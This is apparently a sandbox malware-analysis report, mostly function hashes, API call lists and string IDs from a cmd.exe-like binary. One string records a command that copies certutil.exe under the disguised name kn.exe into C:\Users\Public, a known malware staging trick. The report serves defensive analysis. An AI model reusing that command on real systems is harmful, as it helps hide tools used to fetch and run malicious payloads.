                                                                                                          • Opcode ID: 38a5e45e38bfe07a57e0768e9fc214b37c1ae7ae59c984c6791102e86402e929
                                                                                                          • Instruction ID: b2e334b2d83c723a66aee445f62794649b25a417e846f38fb935ffe5b2525e22
                                                                                                          • Opcode Fuzzy Hash: 38a5e45e38bfe07a57e0768e9fc214b37c1ae7ae59c984c6791102e86402e929
                                                                                                          • Instruction Fuzzy Hash: 3ED2B471B0A682CAEB66AB29F4502B9F7A1FB4574CF914135DA0E47AB4EF3CE444C710
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID: Console$memset$BufferMode$FullInfoNamePathScreen$CharacterCursorErrorFillFlushHandleInputLastOutputPositionWrite_getch_wcsicmpwcschrwcsrchr
                                                                                                          • String ID: %9d$%s
                                                                                                          • API String ID: 4286035211-3662383364
                                                                                                          • Opcode ID: 136cc2a75b229116dd3e54a838434d9f07a228baa8cef88b1cce83190b594ef6
                                                                                                          • Instruction ID: 120485d2136d955039f1c6d2b3f2ad2949236f8c05bf584ab10e3d34772b9225
                                                                                                          • Opcode Fuzzy Hash: 136cc2a75b229116dd3e54a838434d9f07a228baa8cef88b1cce83190b594ef6
                                                                                                          • Instruction Fuzzy Hash: 0B52C572A0AB82CAEB66AB29F8542F9B7A0FB4574CF814131DA0E477B4DF3CD5458710
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID: wcsrchr$towlower
                                                                                                          • String ID: fdpnxsatz
                                                                                                          • API String ID: 3267374428-1106894203
                                                                                                          • Opcode ID: 08d373f91018fc1fdffc976f2f3080daf4c294e0971252b1bba390c6112b5b20
                                                                                                          • Instruction ID: 9b29f103170775d698819813b05886eb9d20eb500a4e23295a03f4d736e6631c
                                                                                                          • Opcode Fuzzy Hash: 08d373f91018fc1fdffc976f2f3080daf4c294e0971252b1bba390c6112b5b20
                                                                                                          • Instruction Fuzzy Hash: 0942FA21B0A68285EB9AAF19F4402B9B7A1FF45B98F854535DE0E077F4EF3CD4598310
                                                                                                          Similarity
                                                                                                          • API ID: File_get_osfhandle$memset$PathPointerReadSearchSizeType_wcsnicmpwcsrchr
                                                                                                          • String ID: DPATH
                                                                                                          • API String ID: 95024817-2010427443
                                                                                                          • Opcode ID: 453260b4bb9689c464f7ee8a055c2a7ad3bf1f5e95a95e4c5e119382bbbdb6fa
                                                                                                          • Instruction ID: a4016625585cb64260c5981a51fdb2e86e1d754b59b57f10fa97cb4649736762
                                                                                                          • Opcode Fuzzy Hash: 453260b4bb9689c464f7ee8a055c2a7ad3bf1f5e95a95e4c5e119382bbbdb6fa
                                                                                                          • Instruction Fuzzy Hash: 0512D672A0A68286E766AF19F440179F7A1FB89758F865235EA4F437B4EF3CD400CB10
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: [...]$ [..]$ [.]$...$:
                                                                                                          • API String ID: 0-1980097535
                                                                                                          • Opcode ID: faea0ce3264b24e9714e5e9f50a61001846328088e1bd545bd05d4c9d0f2d55d
                                                                                                          • Instruction ID: 2148267d59feabd8b1a359a197032ad8684a029fceea51e2146f0ecf7ef750af
                                                                                                          • Opcode Fuzzy Hash: faea0ce3264b24e9714e5e9f50a61001846328088e1bd545bd05d4c9d0f2d55d
                                                                                                          • Instruction Fuzzy Hash: C832A0B1A1A682C6EB22EB69F4402F9B3A0FB4578CF824131DA1D476B5EF3CD545C760
                                                                                                          Similarity
                                                                                                          • API ID: Time$File$System$DateDefaultFormatInfoLocalLocaleUsermemmoverealloc
                                                                                                          • String ID: %02d%s%02d%s%02d$%s $%s %s $.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
                                                                                                          • API String ID: 1795611712-3662956551
                                                                                                          • Opcode ID: 74249970fbf2e4b7620cc53d3e0e908d97b29c4ace187a61a8b0bb0729ed9366
                                                                                                          • Instruction ID: 6fa1048fff5772e3e3b96b9e69ebe45b326370c68369c5df8b013d1f2747177c
                                                                                                          • Opcode Fuzzy Hash: 74249970fbf2e4b7620cc53d3e0e908d97b29c4ace187a61a8b0bb0729ed9366
                                                                                                          • Instruction Fuzzy Hash: EFE1B0A1A0A642C6EB56AB6CF8501B9E6A1FF4978CFC64131D90E476B5EF3CE504C320
                                                                                                          APIs
                                                                                                          • _wcsupr.MSVCRT ref: 00007FF7AB14EF33
                                                                                                          • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7AB14E964), ref: 00007FF7AB14EF98
                                                                                                          • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7AB14E964), ref: 00007FF7AB14EFA9
                                                                                                          • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7AB14E964), ref: 00007FF7AB14EFBF
                                                                                                          • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF7AB14EFDC
                                                                                                          • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7AB14E964), ref: 00007FF7AB14EFED
                                                                                                          • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7AB14E964), ref: 00007FF7AB14F003
                                                                                                          • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7AB14E964), ref: 00007FF7AB14F022
                                                                                                          • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7AB14E964), ref: 00007FF7AB14F083
                                                                                                          • FlushConsoleInputBuffer.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7AB14E964), ref: 00007FF7AB14F092
                                                                                                          • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7AB14E964), ref: 00007FF7AB14F0A5
                                                                                                          • towupper.MSVCRT(?,?,?,?,?,?), ref: 00007FF7AB14F0DB
                                                                                                          • wcschr.MSVCRT(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7AB14E964), ref: 00007FF7AB14F135
                                                                                                          • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7AB14E964), ref: 00007FF7AB14F16C
                                                                                                          • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7AB14E964), ref: 00007FF7AB14F185
                                                                                                            • Part of subcall function 00007FF7AB1301B8: _get_osfhandle.MSVCRT ref: 00007FF7AB1301C4
                                                                                                            • Part of subcall function 00007FF7AB1301B8: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF7AB13E904,?,?,?,?,00000000,00007FF7AB133491,?,?,?,00007FF7AB144420), ref: 00007FF7AB1301D6
                                                                                                          Similarity
                                                                                                          • API ID: Console$Mode$Handle$BufferFileFlushFreeInputLocalType_get_osfhandle_wcsuprtowupperwcschr
                                                                                                          • String ID: <noalias>$CMD.EXE
                                                                                                          • API String ID: 1161012917-1690691951
                                                                                                          • Opcode ID: f8298d22c9df71f240bd9e1abb4a97c4f8b0018ea53697e3e253b80e8643b65e
                                                                                                          • Instruction ID: b2d2335f330b70a60a519a62594fc9c7567e1e5da69b33361c753d49da6bd543
                                                                                                          • Opcode Fuzzy Hash: f8298d22c9df71f240bd9e1abb4a97c4f8b0018ea53697e3e253b80e8643b65e
                                                                                                          • Instruction Fuzzy Hash: B991A562B0665286FB06BB68F4501BDABA0BF49B5CF864235DD0E437B4EF3CA4448320
                                                                                                          APIs
                                                                                                            • Part of subcall function 00007FF7AB133578: _get_osfhandle.MSVCRT ref: 00007FF7AB133584
                                                                                                            • Part of subcall function 00007FF7AB133578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF7AB1232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7AB13359C
                                                                                                            • Part of subcall function 00007FF7AB133578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF7AB1232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7AB1335C3
                                                                                                            • Part of subcall function 00007FF7AB133578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7AB1232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7AB1335D9
                                                                                                            • Part of subcall function 00007FF7AB133578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF7AB1232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7AB1335ED
                                                                                                            • Part of subcall function 00007FF7AB133578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7AB1232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7AB133602
                                                                                                          • _get_osfhandle.MSVCRT ref: 00007FF7AB1232F3
                                                                                                          • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000014,?,?,0000002F,00007FF7AB1232A4), ref: 00007FF7AB123309
                                                                                                          • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF7AB123384
                                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7AB1411DF
                                                                                                          Similarity
                                                                                                          • API ID: Console$LockShared_get_osfhandle$AcquireBufferErrorFileHandleInfoLastModeReleaseScreenTypeWrite
                                                                                                          • String ID:
                                                                                                          • API String ID: 611521582-0
                                                                                                          • Opcode ID: 273daed2c2834dfc8b6dfef377a9808402fe7d58939b34531bf6f611b2348d3e
                                                                                                          • Instruction ID: a3fac9d18bb3d03c077a246fea68b59856ed58aece9752cb234d5f5c0bdc5086
                                                                                                          • Opcode Fuzzy Hash: 273daed2c2834dfc8b6dfef377a9808402fe7d58939b34531bf6f611b2348d3e
                                                                                                          • Instruction Fuzzy Hash: 37A1C421F0A612CAF716AB69F4442BDEAA1FB49B49F865135CD0E477B0EF3CA4458720
                                                                                                          Similarity
                                                                                                          • API ID: Find$File$CloseFirstmemset$AttributesErrorLastNext
                                                                                                          • String ID: \\?\
                                                                                                          • API String ID: 628682198-4282027825
                                                                                                          • Opcode ID: ab4f5c44bb3b2f47c3e9ebd780c12a08782b375ce868dac15c085b2dd5d8372f
                                                                                                          • Instruction ID: add119fcedba83c4f7ed0a8e6d0c23fbb88c7c828f854d76af89bcfd00858d13
                                                                                                          • Opcode Fuzzy Hash: ab4f5c44bb3b2f47c3e9ebd780c12a08782b375ce868dac15c085b2dd5d8372f
                                                                                                          • Instruction Fuzzy Hash: 3DE19122A1A682D6EB66EB28F8402F9A3A0FB4574DF815135DA0E477B4EF3CD555C310
                                                                                                          Similarity
                                                                                                          • API ID: wcschr$memset$ErrorFileHeapLast$AllocAttributesCloseFindMoveProcessProgressWith_setjmpiswspacelongjmpwcsrchr
                                                                                                          • String ID:
                                                                                                          • API String ID: 16309207-0
                                                                                                          • Opcode ID: 19f7487062f5412cc71b33675df9748e948d815796b78eae70ebb84bfe4e28a0
                                                                                                          • Instruction ID: 6485b47a38933f44143f4df09b87383773198a73271a9fee8a598d48c930260e
                                                                                                          • Opcode Fuzzy Hash: 19f7487062f5412cc71b33675df9748e948d815796b78eae70ebb84bfe4e28a0
                                                                                                          • Instruction Fuzzy Hash: 6B22C462706B82C6EB66AF28E8502FAB7A0FF45788F814135DA0E477B5EF3CD1458710
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CriticalSection$ConsoleEnterInfoLeaveOutput_tell_wcsicmpmemset
                                                                                                          • String ID: GOTO$extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                                                                                                          • API String ID: 3863671652-4137775220
                                                                                                          • Opcode ID: cbcadc054eb77bad08336fccbc61f3cbbe122405676500104a0b59942f63a69b
                                                                                                          • Instruction ID: 4533d5c81c55aad01730d38684775f7593f387fe00462a458a1fa7171c814ae4
                                                                                                          • Opcode Fuzzy Hash: cbcadc054eb77bad08336fccbc61f3cbbe122405676500104a0b59942f63a69b
                                                                                                          • Instruction Fuzzy Hash: 3EE18D21A0B342C6FAAABB1DF454379A690BF49748FD74535CA0E422F4EF3CE4468721
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FormatMessage$ByteCharMultiWide_ultoawcschr
                                                                                                          • String ID: $Application$System
                                                                                                          • API String ID: 3538039442-1881496484
                                                                                                          • Opcode ID: 6194e2a1b63514fbe775a342b0db58f28aa4d046a1287b5b4022a3f3c67c0b5b
                                                                                                          • Instruction ID: df813fa986b3e7ca9aac417562cbdecacc9e4da098d91fbec0859704e68d9c87
                                                                                                          • Opcode Fuzzy Hash: 6194e2a1b63514fbe775a342b0db58f28aa4d046a1287b5b4022a3f3c67c0b5b
                                                                                                          • Instruction Fuzzy Hash: B951A272A0AB4197EB229B19F44467AFAA1FB89B48F864234DE4E43774EF3CD445C710
                                                                                                          APIs
                                                                                                          • longjmp.MSVCRT(?,?,00000000,00007FF7AB14048E), ref: 00007FF7AB14DA58
                                                                                                          • memset.MSVCRT ref: 00007FF7AB14DAD6
                                                                                                          • memset.MSVCRT ref: 00007FF7AB14DAFC
                                                                                                          • memset.MSVCRT ref: 00007FF7AB14DB22
                                                                                                            • Part of subcall function 00007FF7AB133A0C: FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF7AB14EAC5,?,?,?,00007FF7AB14E925,?,?,?,?,00007FF7AB12B9B1), ref: 00007FF7AB133A56
                                                                                                            • Part of subcall function 00007FF7AB125194: VirtualAlloc.API-MS-WIN-CORE-MEMORY-L1-1-0 ref: 00007FF7AB1251C4
                                                                                                            • Part of subcall function 00007FF7AB13823C: FindFirstFileExW.KERNELBASE ref: 00007FF7AB138280
                                                                                                            • Part of subcall function 00007FF7AB13823C: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7AB13829D
                                                                                                            • Part of subcall function 00007FF7AB1301B8: _get_osfhandle.MSVCRT ref: 00007FF7AB1301C4
                                                                                                            • Part of subcall function 00007FF7AB1301B8: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF7AB13E904,?,?,?,?,00000000,00007FF7AB133491,?,?,?,00007FF7AB144420), ref: 00007FF7AB1301D6
                                                                                                            • Part of subcall function 00007FF7AB124FE8: _get_osfhandle.MSVCRT ref: 00007FF7AB125012
                                                                                                            • Part of subcall function 00007FF7AB124FE8: ReadFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7AB125030
                                                                                                          • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7AB14DDB0
                                                                                                            • Part of subcall function 00007FF7AB1259E4: CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7AB125A2E
                                                                                                            • Part of subcall function 00007FF7AB1259E4: _open_osfhandle.MSVCRT ref: 00007FF7AB125A4F
                                                                                                          • _get_osfhandle.MSVCRT ref: 00007FF7AB14DDEB
                                                                                                          • SetEndOfFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7AB14DDFA
                                                                                                          • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7AB14E204
                                                                                                          • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7AB14E223
                                                                                                          • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7AB14E242
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: File$_get_osfhandlememset$Find$AllocAttributesCloseCreateErrorFirstLastReadTypeVirtual_open_osfhandlelongjmp
                                                                                                          • String ID: %9d$%s$~
                                                                                                          • API String ID: 3651208239-912394897
                                                                                                          • Opcode ID: ab2ad948d6a97cdcb1dc93790fda6d9a1dccb8bf0f4939a4d6f77afca15fad3e
                                                                                                          • Instruction ID: bd8f269c2a165d4fe27e7b60004d984a79b7df2f2f244fe0b1e1c5d094a24e7a
                                                                                                          • Opcode Fuzzy Hash: ab2ad948d6a97cdcb1dc93790fda6d9a1dccb8bf0f4939a4d6f77afca15fad3e
                                                                                                          • Instruction Fuzzy Hash: 3B42C372A0968286EB66BF28F8501FDB3A0FB4574CF810436D60D47AB9EF3CE9558710
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: wcsrchr$ErrorLast$AttributesFile_wcsnicmpiswspacememsetwcschr
                                                                                                          • String ID: COPYCMD$\
                                                                                                          • API String ID: 3989487059-1802776761
                                                                                                          • Opcode ID: 5bff41a680e467b1b33a0b7bb16375dc4a11cdb88bd4a8787dadcd2c99fb79b7
                                                                                                          • Instruction ID: 9bd5bc5a62acdcbfd3d05b01c39a3a0677e118c48fe3fffa944f31d8a774b1f1
                                                                                                          • Opcode Fuzzy Hash: 5bff41a680e467b1b33a0b7bb16375dc4a11cdb88bd4a8787dadcd2c99fb79b7
                                                                                                          • Instruction Fuzzy Hash: C5F1D365A0A786C5EA56BB19F4402BAE7A0FF45B8CF968135CA4E077B4EE3CE445C310
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Time$File$System$FormatInfoLocalLocale
                                                                                                          • String ID: $%02d%s%02d%s$%2d%s%02d%s%02d%s%02d$.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC$HH:mm:ss t
                                                                                                          • API String ID: 55602301-2548490036
                                                                                                          • Opcode ID: d793cf68f885368b4ca952d7378f9a0084057b150934299f8dfb9ae4312d122b
                                                                                                          • Instruction ID: 4c6f0cceda0d7ad6ac2ac66ac3b7561f6cf84792a3df196b658a147f9cb0bc14
                                                                                                          • Opcode Fuzzy Hash: d793cf68f885368b4ca952d7378f9a0084057b150934299f8dfb9ae4312d122b
                                                                                                          • Instruction Fuzzy Hash: EDA1B433A0A74296EB56AB18F4405BAF7A0FB44758FD20135DA4E436B4EF3CE548C760
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Path$ErrorName$Lastmemset$CreateDirectoryFileFullVolumememmove$CloseControlDriveFreeHandleHeapInformationName_RemoveStatusType_wcsicmp
                                                                                                          • String ID:
                                                                                                          • API String ID: 3935429995-0
                                                                                                          • Opcode ID: 2ee110a42e0ffdb27aede9fb5eb1a80379d063d7b2cbba6d0c9e22b52d84b57f
                                                                                                          • Instruction ID: d0a42f2dbe28a034d0d0ec364c7e23aebc90fb2bc874cc0a3eabc26c58f231e9
                                                                                                          • Opcode Fuzzy Hash: 2ee110a42e0ffdb27aede9fb5eb1a80379d063d7b2cbba6d0c9e22b52d84b57f
                                                                                                          • Instruction Fuzzy Hash: A561B022A1969282E712AF2DF484579FBA4FB89F58F868234DE4B437B0DF3CD4019710
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AttributesFile
                                                                                                          • String ID:
                                                                                                          • API String ID: 3188754299-0
                                                                                                          • Opcode ID: 41fbdc0f45981392a8be1ae3f0b798cbf48c2336bf4ed7969cfd2cedfd2f237f
                                                                                                          • Instruction ID: 4753085cfb10e0c6524431fcf01ec9e4f3174c543bced183ac7098c382715b1b
                                                                                                          • Opcode Fuzzy Hash: 41fbdc0f45981392a8be1ae3f0b798cbf48c2336bf4ed7969cfd2cedfd2f237f
                                                                                                          • Instruction Fuzzy Hash: D191C27260A6828AEB26AF2CF4502F9BAA0FB45748F864135DA4E477B4EF3CD545D210
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470595606.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_4_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _get_osfhandlememset$wcschr
                                                                                                          • String ID: DPATH
                                                                                                          • API String ID: 3260997497-2010427443
                                                                                                          • Opcode ID: 3d336d0508f9d51260e4716dc0b75001e2ca59ffb0876634830191a582af1c3b
                                                                                                          • Instruction ID: fa0974ff6e9740c27ee19cfe37be822cb5305316cab778d46c36d4976ae5e575
                                                                                                          • Opcode Fuzzy Hash: 3d336d0508f9d51260e4716dc0b75001e2ca59ffb0876634830191a582af1c3b
                                                                                                          • Instruction Fuzzy Hash: 94D18222A0A642C6EB56BB2DF4401BEA2A1FF44B5CF864235D91D477F4DF3CE8468760
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000004.00000002.1470461110.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000004.00000002.1470443280.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000004.00000002.1470526099.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmp
